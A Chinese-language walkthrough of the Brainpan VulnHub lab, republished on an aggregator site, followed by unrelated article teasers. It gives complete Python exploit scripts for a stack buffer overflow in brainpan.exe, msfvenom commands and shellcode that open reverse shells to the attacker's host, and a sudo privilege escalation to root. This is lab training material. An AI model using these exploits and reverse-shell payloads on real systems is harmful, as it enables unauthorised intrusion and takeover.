Brainpan(VulnHub)

Brainpan

1、nmap

image-20240208092718473

image-20240208092736948

image-20240208092638274

image-20240208092702684

2、web渗透

随便看看

image-20240208093008507

目录爆破

使用不同工具,不同字典进行爆破

image-20240208093340385

image-20240208093352028

image-20240208093403449

9999端口分析

image-20240208094325933

image-20240208094612818

10000端口分析

image-20240208094409837

字符串信息中,提示这个程序不能运行在DOS模式下,然后有32个A,还有一行关于复制字节到缓冲区的信息,还有一行比较奇怪的字符shitstorm,有可能会是密码,接下来就是之前浏览器看到的ascii图案。

image-20240208093609205

image-20240208094752972

3、常规的缓冲区溢出漏洞分析与利用

缓冲区溢出漏洞识别

在window环境下运行brainpan.exe,可以看到出现了一个如下的界面:

image-20240209132909828

大概是说初始化了一个winsock,端口是9999,等待连接中。那么我们可以用nc尝试连接这个windows机器的9999端口,先随便输入一个PASSWORD试试:

image-20240209134056398

可以发现提示复制了3个字节到缓冲区,如果输入shitstorm,回显也基本一致,但check会是0,可以判断可能check为0说明密码正确,为-1说明错误。由于涉及到复制字节到缓冲区的过程,那么这里就有可能存在缓冲区溢出的漏洞。

如果我们输入一个非常长的字符串,是否会造成溢出而导致程序崩溃呢?如果会出现溢出,那么这个“非常长”到底是多长的字符串呢?此时我们可以写一个python2的脚本exp1.py进行测试,代码如下:

#!/usr/bin/python
#encoding: utf-8
import socket
import time
import sys#figure out how many chars could make brainpan.exe crush
size = 100
while True:try:s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    #用于建立socket连接s.connect(("192.168.126.184",9999))      #连接windows机器的9999端口buffer = 'A' * size     #待发送字符串的长度,按照100个字符逐渐增加(一个缓冲区,用A去填充)print "\n[+]Send evil buffer %s bytes." % size      #提示发送了多少个字符s.send(buffer)     #发送字符串s.close()          #连接关闭size += 100time.sleep(2)      #每发送一次,睡眠2s,便于我们观测过程except:print "\n[+] Could not connect,error!\n"   #出现异常的提示sys.exit()      #系统退出

image-20240209143613173

image-20240209143455890

会发现当发送600长度的字符串后,brainpan.exe会直接结束运行,利用文件exp1.py也停止发送。说明确实存在溢出漏洞。所谓缓冲区溢出的漏洞利用,就是通过构造溢出,添加我们的payload,修改程序的执行流程,最终会执行我们添加的payload(反弹shell等),核心在于是否可以溢出?怎么修改执行流程?怎么添加payload?这就是缓冲区溢出的全局思路,接下来的所有操作都是基于这个大局观。

最多不超过600字节就会导致缓冲区溢出。那具体是多少个字节呢?

定位eip寄存器(确定溢出字符串的长度)

我们可以用工具msf-pattern_creat生成一个600字节的字符串,该字符串的特点是:其中的连续子串可以唯一被定位位置。

image-20240209213939369

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

然后用在Windows上使用ImmunityDebugger打开brainpan.exe文件(先使用Windows对文件进行分析)。此时ImmunityDebugger这个工具相当于充当了CPU与brainpan.exe的中介,方便我们观察程序运行时的汇编语言的程序流、寄存器、堆栈、内存等情况。可以看到右下角是Paused,意思是这个文件是暂停状态的,我们点击左上角的running program按钮(左数第7个,或者直接按F9)启动程序,此时右下角提示状态变为了Running。这种启动与直接双击exe文件的区别就是,使用ImmunityDebugger作为了中介而已。

image-20240209135640451

然后我们用刚刚生成的600字符的字符串,重新构造payload,编写如下的exp2:

#!/usr/bin/python
#encoding: utf-8
import socket
import time
import sys#figure out how many chars could make brainpan.exe crush
try:s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    #用于建立socket连接s.connect(("192.168.126.184",9999))      #连接windows机器的9999端口buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9'     #发送600字符的pattern字符串print "\n[+]Send evil buffer 600 bytes."      #提示发送了多少个字符s.send(buffer)     #发送字符串s.close()          #连接关闭
except:print "\n[+] Could not connect,error!\n"   #出现异常的提示sys.exit()      #系统退出

image-20240209143344195

image-20240209143334240

回到ImmunityDebugger,可以看到这个字符串填入了EDX中,EDX还不够装,ESP中还装了一部分。而特别需要关注的寄存器是EIP(instrutor pointer指令指针),这个寄存器标记了下一条指令的内存地址,是进行缓冲区溢出的关键所在。

如上图,EIP内的值是35724134,这是ASCII码的值,由于小端显示的原因(逆序),相当于4Ar5。

image-20240209141718209

接下来我们就是寻找35724134(4Ar5)在msf-pattern_creat生成的600字节字符串中的位置,以下两条命令均可:

msf-pattern_offset -l 600 -q 35724134
msf-pattern_offset -l 600 -q 4Ar5

image-20240209141949989

可以看到偏移量是524,也就是只要发送524+4个字符,即可覆盖EIP寄存器,EIP寄存器存储的内容就是发送的528个字符中的最后4个字符(也就是说,第525-528个字符会填充EIP寄存器)。

为了验证发送的第525-528个字符会填充EIP寄存器,我们可以构造一个payload,发送600个字符,前524个字符都是A,第525-528个字符是B,用于覆盖EIP,最后72个字符用于凑数,都是C,据此编写exp3.py

#!/usr/bin/python
#encoding: utf-8
import socket
import time
import sys#cover EIP with 'BBBB'try:s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.126.184",9999))buffer = 'A' * 524 + 'B' * 4 + 'C' * 72print "\n[+]Send evil buffer 600 bytes(524 A, 4 B, 72 C)."s.send(buffer)s.close()
except:print "\n[+] Could not connect,error!\n"sys.exit()

重新打开ImmuityDebugger,运行brainpan.exe后(点击左上角左数第6个按钮×后,再重新打开brainpan.exe,点击菜单栏的file->open,打开文件后,再点击左上角左数第7个按钮运行。特别注意!!!每次运行新的exp前,都要进行如此重新打开的操作。),在kali中执行这个exp3.py:

image-20240209142809454

果然,EIP寄存器被覆盖为了BBBB(B的ascii码的16进制是42),EDX被覆盖为了若干个A,ESP被覆盖为了72个C。

image-20240209143017489

也可以在堆栈区域看到内存的情况。

image-20240209143021312

ESP扩容(判断ESP寄存器的大小是否够装shellcode)

我们企图将shellcode放到ESP中,也就是现在72个C的位置,然而shellcode的大小通常是300-400字节左右,显然72字节是不够的,因此我们尝试再次进行溢出,这次发送的字符串是524个A、4个B、500个C,再次运行看看程序的崩溃情况和ESP内部的情况,如果崩溃情况与之前相同,ESP存放了500个C,就说明ESP的大小足够存放shellcode。构造如下的exp4.py:

#!/usr/bin/python
#encoding: utf-8
import socket
import time
import sys#cover EIP with 'BBBB',cover ESP with 'C'*500 to figure out if ESP is big enough to cover shellcode.
try:s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.126.184",9999))buffer = 'A' * 524 + 'B' * 4 + 'C' * 500print "\n[+]Send evil buffer 1028 bytes(524 A, 4 B, 500 C)."s.send(buffer)s.close()
except:print "\n[+] Could not connect,error!\n"sys.exit()

image-20240209154643551

运行后寄存器的情况如下:

image-20240209154657048

ESP中存放了许多个C,没出啥问题。查看堆栈中的情况,找到C出现的开始位置和终止位置,可以看到首次出现C的内存地址是005FF910,最后4个C的内存地址是005FFAE4:

image-20240209154855565

那么ESP的大小就是005FFAE4-005FF910+4=472字节,应该足够存放反弹shell的shellcode。

第六步:坏字节识别

在C语言中,00是一个坏字符,作用是截断。所谓坏字节,就是程序中存在的会导致代码无法正常执行的字符,与程序本身和通信协议都相关。可以在github中具体查看坏字节的情况:https://github.com/cytopia/badchars

可能存在的坏字节如下,图中没有包括\x00,因为\x00一定是坏字节,不需要再进行识别。

image-20240209155938384

下面我们构造exp5.py,将可能的坏字节填充到ESP中,查看寄存器和内存的情况,exp5.py如下:

#!/usr/bin/python
#encoding: utf-8
import socket        
import time                   
import sys#find badchars,cover ESP with possible badchars                                                             try:s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.126.184",9999))badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" +"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" +"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" +"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" +"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" +"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" +"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" +"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" +"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" +"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" +"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" +"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" +"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" +"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" +"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")buffer = 'A' * 524 + 'B' * 4 + badcharsprint "\n[+]Send evil buffer many bytes(524 A, 4 B, 255 badchars)."s.send(buffer)s.close()
except:print "\n[+] Could not connect,error!\n"sys.exit()

image-20240209160706724

运行exp5.py,观察ESP的情况:

点击ESP后的内存地址,然后右键->Follow in Dump,即可在左下的窗口看到内存情况

image-20240209161108042

左下的窗口如下,可以看到从01到FF是连续的,说明没有出现坏字节。如果有坏字节,可能会出现很多00的空字节。

image-20240209161115439

JMP ESP定位

虽然ESP中可以存放shellcode,但我们如何保证程序的执行流程跳转到ESP中呢?这就需要通过EIP进行重定向,也就是找到汇编指令JMP ESP的内存地址,将这个内存地址覆盖到EIP中。由于EIP标记了下一条指令的执行地址,如果EIP被我们覆盖成了JMP ESP指令的内存地址,那么程序就会执行JMP ESP,然后如果ESP中存放了shellcode的话,就会成功利用。

首先,我们要找到指令JMP ESP的内存地址,在进行搜索的时候,不能用JMP ESP这样的字符直接搜索,而要用操作码opcode,JMP ESP的操作码可以用msf-nasm_shell进行查找,可以发现JMP ESP的操作码是FFE4。image-20240209164455347

接下来就是搜索FFE4了。在ImmuityDebugger中,可以很方便的直接执行python的一些脚本。在左下角的输入框输入!mona modules,可以看到当前运行程序的保护机制。通过mona.py可以看到当前运行的brainpan.exe的保护机制都是False,很容易被利用。因此靶机本身恰巧就支持我们定位JMP ESP,其实这里也不必强求非要利用靶机中的JMP ESP,寻找其他安全机制没有开启的程序也可以,只是当前的windows运行的其他程序都开启了许多安全机制,难以定位JMP ESP。

image-20240209165207746

这里插叙一下,我第一次安装ImmuityDebugger后,输入!mona modules直接报错pycommands:error importing module。这是因为ImmuityDebugger的默认脚本并不保护mona.py这个文件,需要下载mona.py,并将这个文件放在PyCommends路径下。mona.py的下载地址见https://github.com/corelan/monaimage-20240209165039233

然后我们在brainpan.exe中搜索ffe4,命令如下:

!mona find -s  "\xff\xe4"  -m brainpan.exe

image-20240209165404830

总共找到了一个内存位置,311712f3,这个内存地址下存放了JMP ESP的指令。 因此我们要将这个内存地址写到EIP中,也就是之前写入B的位置。由于小端显示的问题,需要按照字节倒序的方式填入EIP中即"\xf3\x12\x17\x31"。

第八步:在ESP中填入shellcode

最后构造反弹shell的shellcode,这里直接用msfvemon生成即可,LHOST和LPORT指定ip和端口,-b指定坏字符,-e指定编码方式,这里选用shikata_ga_nai,这是个日语词汇,在免杀绕过领域比较好用,-f形成c语言代码。生成的shellcode的大小是351个字节(由于编码方式,每次生成的结果是不一样的):

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.126.193 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f c

image-20240209170213875

然后我们把原来ESP中C的位置填写为上述shellcode(这里的shellcode和上图不是一次生成的,所以不一样,只要填入msfvemon生成的反弹shell即可)。shikata_ga_nai的编码方式对于我们进行免杀和绕过很有作用。但也会在生成几个“桩”用于解码。因此在构造payload的时候应该在ESP的开头位置填入若干个啥也不做的指令NOP(\x90),称为slide,防止“桩”被抹掉导致代码无法成功执行,再添加shellcode。当然,即使我们不适用编码进行免杀绕过,也可以添加几个NOP,滑过一些字节,保证shellcode不会被“抹掉”。完整的代码如下exp6.py:

#!/usr/bin/python
#encoding: utf-8
import socket
import time
import sys#set payload(windows_reverse_shell) for windowstry:s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.126.184",9999))ebp = "311712f3"badchars = '\x00'shellcode = ("\xb8\xa9\xba\xb5\xd8\xda\xc3\xd9\x74\x24\xf4\x5a\x2b\xc9""\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x6b\xbe\x57\x2d\x97""\x57\x15\xce\x67\xa8\x7a\x46\x82\x99\xba\x3c\xc7\x8a\x0a""\x36\x85\x26\xe0\x1a\x3d\xbc\x84\xb2\x32\x75\x22\xe5\x7d""\x86\x1f\xd5\x1c\x04\x62\x0a\xfe\x35\xad\x5f\xff\x72\xd0""\x92\xad\x2b\x9e\x01\x41\x5f\xea\x99\xea\x13\xfa\x99\x0f""\xe3\xfd\x88\x9e\x7f\xa4\x0a\x21\x53\xdc\x02\x39\xb0\xd9""\xdd\xb2\x02\x95\xdf\x12\x5b\x56\x73\x5b\x53\xa5\x8d\x9c""\x54\x56\xf8\xd4\xa6\xeb\xfb\x23\xd4\x37\x89\xb7\x7e\xb3""\x29\x13\x7e\x10\xaf\xd0\x8c\xdd\xbb\xbe\x90\xe0\x68\xb5""\xad\x69\x8f\x19\x24\x29\xb4\xbd\x6c\xe9\xd5\xe4\xc8\x5c""\xe9\xf6\xb2\x01\x4f\x7d\x5e\x55\xe2\xdc\x37\x9a\xcf\xde""\xc7\xb4\x58\xad\xf5\x1b\xf3\x39\xb6\xd4\xdd\xbe\xb9\xce""\x9a\x50\x44\xf1\xda\x79\x83\xa5\x8a\x11\x22\xc6\x40\xe1""\xcb\x13\xc6\xb1\x63\xcc\xa7\x61\xc4\xbc\x4f\x6b\xcb\xe3""\x70\x94\x01\x8c\x1b\x6f\xc2\x73\x73\x11\xd3\x1c\x86\xed""\xd2\x67\x0f\x0b\xbe\x87\x46\x84\x57\x31\xc3\x5e\xc9\xbe""\xd9\x1b\xc9\x35\xee\xdc\x84\xbd\x9b\xce\x71\x4e\xd6\xac""\xd4\x51\xcc\xd8\xbb\xc0\x8b\x18\xb5\xf8\x03\x4f\x92\xcf""\x5d\x05\x0e\x69\xf4\x3b\xd3\xef\x3f\xff\x08\xcc\xbe\xfe""\xdd\x68\xe5\x10\x18\x70\xa1\x44\xf4\x27\x7f\x32\xb2\x91""\x31\xec\x6c\x4d\x98\x78\xe8\xbd\x1b\xfe\xf5\xeb\xed\x1e""\x47\x42\xa8\x21\x68\x02\x3c\x5a\x94\xb2\xc3\xb1\x1c\xc2""\x89\x9b\x35\x4b\x54\x4e\x04\x16\x67\xa5\x4b\x2f\xe4\x4f""\x34\xd4\xf4\x3a\x31\x90\xb2\xd7\x4b\x89\x56\xd7\xf8\xaa""\x72")                                                                                             buffer = 'A' * 524 + '\xf3\x12\x17\x31' + '\x90' * 16 + shellcodeprint "\n[+]Send evil buffer many bytes(524 A, pos jmp ESP, 16 NOP, shellcode),including payload:windows_reverse_shell."s.send(buffer)s.close()
except:print "\n[+] Could not connect,error!\n"sys.exit()

image-20240209170806820

回到kali中,先开启nc监听443端口,然后在ImmunityDebugger中重启brainpan.exe,运行exp6.py,成功拿到了windows机器的反弹shell:

image-20240209170827509

我们的目标是搞到靶机linux的shell,因此重新生成linux环境的反弹shell:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.2.228 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f c

image-20240209203051111

然后修改payload为exp7.py:

#!/usr/bin/python
#encoding: utf-8
import socket
import time
import sys#set payload(linux_reverse_shell) for target machinetry:s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.2.215",9999))ebp = "311712f3"badchars = '\x00'shellcode = ("\xbb\xee\x7b\x55\x53\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9""\xb1\x12\x31\x5a\x12\x03\x5a\x12\x83\x04\x87\xb7\xa6\xe9""\xa3\xcf\xaa\x5a\x17\x63\x47\x5e\x1e\x62\x27\x38\xed\xe5""\xdb\x9d\x5d\xda\x16\x9d\xd7\x5c\x50\xf5\x27\x36\xa0\xe1""\xc0\x45\xa5\xe8\xab\xc3\x44\x5a\xad\x83\xd7\xc9\x81\x27""\x51\x0c\x28\xa7\x33\xa6\xdd\x87\xc0\x5e\x4a\xf7\x09\xfc""\xe3\x8e\xb5\x52\xa7\x19\xd8\xe2\x4c\xd7\x9b")buffer = 'A' * 524 + '\xf3\x12\x17\x31' + '\x90' * 16 + shellcodeprint "\n[+]Send evil buffer many bytes(524 A, pos jmp ESP, 16 NOP, shellcode),including payload:linux_reverse_shell."s.send(buffer)s.close()
except:print "\n[+] Could not connect,error!\n"sys.exit()

image-20240209203302047

回到kali中,再次开启nc监听443端口,然后在ImmunityDebugger中重启brainpan.exe,运行exp7.py,成功拿到了靶机linux机器的反弹shell:

image-20240209204254642

4、内网渗透

发现Linux下有Windows服务的原因

image-20240209204614252

随便看看

image-20240209204718238

image-20240209204809324

提权

可以发现当前用户拥有免密运行/home/anansi/bin/anansi_util的权限,那么我们就运行试试:

image-20240209210850367

提示未知的终端类型,再试试查看手册吧,后面要加一个commind,我们干脆就查看ls:

image-20240209210956437

此处可以交互!他让我们按下回车键,我们先不按。此时应该是以root身份读取ls的手册,那么如果在此处启动一个bash,应该也是root的session,因此我们在此处输入:

image-20240209215919944

5、最后的话

由于缓冲区溢出纯纯零基础开始学习。还是得感谢Bossfrank以及红笔佬的视频交叉学习。

本文大部分是参考Bossfrank学习的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/825728.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

谈谈前端CSS盒模型

前言: 什么是CSS盒模型?盒模型的构造? 在前端开发中,CSS 盒模型是一种非常基础且核心的概念,它描述了文档中的每个元素被框架处理的方式。 ---- 打开浏览器开发者工具,查看Elements右侧下的Styles底部。 …

libVLC Ubuntu编译详解

1.简介 有时候,windows上开发不满足项目需求,需要移植到linux上,不得不自行编译libvlc,编译libvlc相对而言稍微麻烦一点。 我使用的操作系统:Ubuntu20.04 查看系统命令lsb_release -a libvlc版本: 3.0.1…

elment-plus 中 table 左对齐

elment-plus 中 table 左对齐 <el-tablev-loading"loading"class"flex-1 !h-auto":data"roleList":header-cell-style"{text-align: left }":row-style"{ height: 55px }":cell-style"{ text-align: left }"&…

Argus DBM 一款开源的数据库监控工具,无需部署Agent

开箱即用 无需部署Agent&#xff0c;开箱即用。我们使用JDBC直连您的数据库&#xff0c;输入IP端口账户密码即可。 全平台支持 Argus目前支持对Mysql, PostgreSQL, Oracle等数据库类型的监控&#xff0c;我们也会尽快适配其它数据库&#xff0c;致力于监控所有数据库。我们提…

AES 加解密(包含JS、VUE、JAVA、MySQL)工具方法

介绍 AES 是 Advanced Encryption Standard 的缩写&#xff0c;是最常见的对称加密算法。AES 在密码学中又称 Rijndael 加密法&#xff0c;是美国联邦政府采用的一种区块加密标准。这个标准用来替代原先的 DES&#xff0c;已经被多方分析且广为全世界所使用。 基本原理&#…

python 使用 Stable Diffusion API 生成图片示例

python 使用 Stable Diffusion API 生成图片示例 一、前言 在无聊的时候&#xff0c;想瞅一下sd生图遂做了一下 二、具体步骤 1、启动SD的api设置 注意&#xff0c;运行后的api相关功能可以在:http://127.0.0.1:7860/docs 查看 比如这一次我们要的生图的地址就是/sdapi/v1…

华为OD机试 - 结队编程(Java 2024 C卷 100分)

华为OD机试 2024C卷题库疯狂收录中&#xff0c;刷题点这里 专栏导读 本专栏收录于《华为OD机试&#xff08;JAVA&#xff09;真题&#xff08;A卷B卷C卷&#xff09;》。 刷的越多&#xff0c;抽中的概率越大&#xff0c;每一题都有详细的答题思路、详细的代码注释、样例测试…

户外旅行摄影手册,旅游摄影完全攻略

一、资料前言 本套旅游摄影资料&#xff0c;大小295.47M&#xff0c;共有9个文件。 二、资料目录 《川藏线旅游摄影》杨桦.彩印版.pdf 《户外摄影指南》(Essential.Guide.to.Outdoor.photography.amateur)影印版.pdf 《旅行摄影大师班》(英)科尼什.扫描版.PDF 《旅行摄影…

数据结构面试常见问题:数组和链表的区别是什么?

数组 在编程的世界里&#xff0c;数组无疑是最基础的数据结构之一&#xff0c;它像一排整齐的房子&#xff0c;每个房子都有自己的门牌号&#xff0c;我们可以通过这个门牌号直接找到这个房子&#xff0c;无需从头至尾的逐一查找。这个门牌号&#xff0c;就是我们所说的索引&am…

一键下载全自动安装Office全家桶

概述 今天分享一款超级强大的工具软件&#xff0c;该软件实现了一键自动化下载、安装Office全家桶的功能。整套安装流程堪称行云流水&#xff0c;从下载到安装全自动&#xff0c;无需上手操作。只需要安装该工具软件后&#xff0c;点击安装即可。软件会自动识别不同的操作系统架…

Oracle——领先的企业级数据库解决方案

一、WHAT IS ORACLWE&#xff1a; ORACLE 数据库系统是美国 ORACLE 公司&#xff08;甲骨文&#xff09;提供的以分布式数据库为核心的一组软件产品&#xff0c;是目前最流行的客户/服务器(CLIENT/SERVER)或B/S 体系结构的数据库之一&#xff0c;ORACLE 通常应用于大型系统的数…

【计算机毕业设计】微信小程序:MHK自学平台的设计与实现——后附源码

&#x1f389;**欢迎来到我的技术世界&#xff01;**&#x1f389; &#x1f4d8; 博主小档案&#xff1a; 一名来自世界500强的资深程序媛&#xff0c;毕业于国内知名985高校。 &#x1f527; 技术专长&#xff1a; 在深度学习任务中展现出卓越的能力&#xff0c;包括但不限于…

MajorDoMo thumb.php 未授权RCE漏洞复现(CNVD-2024-02175)

0x01 产品简介 MajorDoMo是MajorDoMo社区的一个开源DIY智能家居自动化平台。 0x02 漏洞概述 MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞&#xff0c;未经身份验证的攻击者可利用此漏洞执行任意指令&#xff0c;获取服务器权限。 0x03 影响范围 MajorD…

ARM64架构栈帧回溯

文章目录 前言一、栈帧简介二、demo演示 前言 请参考&#xff1a;ARM64架构栈帧以及帧指针FP 一、栈帧简介 假设下列函数调用&#xff1a; funb() {func() }funa() {funb() }main() {funa() }main函数&#xff0c;funa函数&#xff0c;funb函数都不是叶子函数&#xff0c;其…

MySQL 的事务概念

事务概念 MySQL事务是一个或者多个的数据库操作&#xff0c;要么全部执行成功&#xff0c;要么全部失败回滚。 事务是通过事务日志来实现的&#xff0c;事务日志包括&#xff1a;redo log和undo log。 事务状态 事务有以下五种状态&#xff1a; 活动的部分提交的失败的中止的…

详解爬虫基本知识及入门案列(爬取豆瓣电影《热辣滚烫》的短评 详细讲解代码实现)

目录 前言什么是爬虫&#xff1f; 爬虫与反爬虫基础知识 一、网页基础知识 二、网络传输协议 HTTP&#xff08;HyperText Transfer Protocol&#xff09;和HTTPS&#xff08;HTTP Secure&#xff09;请求过程的原理&#xff1f; 三、Session和Cookies Session Cookies Session与…

股权融资成本GLS模型计算

一、模型公式 式中&#xff1a; r 为股权融资成本 P为股价 B为每股净资产 FROE为预测每股净资产收益率 目标&#xff1a;求解股权融资成本r 二、模型口径参考来源 PS&#xff1a;实际以代码为准 ①FROE&#xff08;预测每股净资产收益率&#xff09;: 资本市场开放与…

“R+遥感”的水环境综合评价方法实践技术应用

张博士&#xff0c;来自重点高校及科研院所一线科研人员&#xff0c;长期从事机器学习、遥感技术与应用研究&#xff0c;主持多项国家级科研项目&#xff0c;编写著作3部&#xff0c;第一作者发表科研论文20余篇。对国内外遥感技术的多平台、多传感器应用现状&#xff0c;以及涉…

【leetcode面试经典150题】59. 合并两个有序链表(C++)

【leetcode面试经典150题】专栏系列将为准备暑期实习生以及秋招的同学们提高在面试时的经典面试算法题的思路和想法。本专栏将以一题多解和精简算法思路为主&#xff0c;题解使用C语言。&#xff08;若有使用其他语言的同学也可了解题解思路&#xff0c;本质上语法内容一致&…

Elasticsearch:简化 KNN 搜索

作者&#xff1a;来自 Elastic Panagiotis Bailis 在这篇博客文章中&#xff0c;我们将深入探讨我们为了使 KNN 搜索的入门体验变得更加简单而做出的努力&#xff01; 向量搜索 向量搜索通过在 Elasticsearch 中引入一种新的专有的 KNN 搜索类型&#xff0c;已经可以使用一段…